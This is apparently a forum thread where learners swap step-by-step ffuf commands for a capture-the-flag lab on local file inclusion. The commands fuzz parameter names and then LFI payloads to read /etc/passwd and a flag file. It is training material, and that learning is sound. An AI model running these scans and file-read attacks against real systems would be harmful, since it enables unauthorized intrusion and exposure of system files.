File Inclusion/Automated Scanning[questions]

| grep -v 2309
was looking for " | grep -v 2309" this on google… and find this in your comment on the forum… good work man… thanks


Actually, the solution is very simple. If you know how to use the Fuff tool, the solution will take 3 minutes.

First, we use “burp-parameter-names.txt” payloads to find the parameter. We are filtering the “-fs” result size.

ffuf -w burp-parameter-names.txt:FUZZ -u "" -fs 2309

-fs size may differ.

XXXX = the 1 parameter you found.

After finding XXXX. Try “LFI-Jhaddix.txt” payloads to read /etc/passwd file.

ffuf -w LFI-Jhaddix.txt:FUZZ -u "" -fs 1935 

You will be successful when you do the filtering process with Fuff.


step first
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u ‘http://IP:PORT/index.php?FUZZ=value’ -fs 2287
for find size
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u ‘http://IP:PORT/index.php?FUZZ=value’ -fs “size found”
and then
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u ‘http://IP:PORT/index.php?FUZZ=value’ -fs “size found”
you will see *FUZZ = xxxx 4 chatactor
and then
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u ‘’ -fs “size found”
You will found
replace etc/passwd with flag.txt
you will see flag HTB{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}

with fuzzing i get v*** but i cant figure out this “You will found
…/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/etc/passwd” where i get 700 resonse from ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u ‘’ -fs “

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u ‘’ -fs 1935

instead etc/passwd with flag.txt

1 Like

Thanks by the explanation support me to understand how works this skills assignments.

Hey Luv2Hack, thank you for your help. It was very helpful, as i was drowning myself in unnecessary confusion. Just managed it! Cheers!

yes it’s all sweet, but…

i can’t understand why it doesn’t work!!!

path of LFI-Jhaddix.txt (worldlist) may not be the same
Check path of file or worldlist

I’m speechless. I spent more than 3 hours trying to get RCE to find the flag easily because I imagined that it was named with some kind of random numbers. It was in the root folder with the name “flag.txt”… Nice.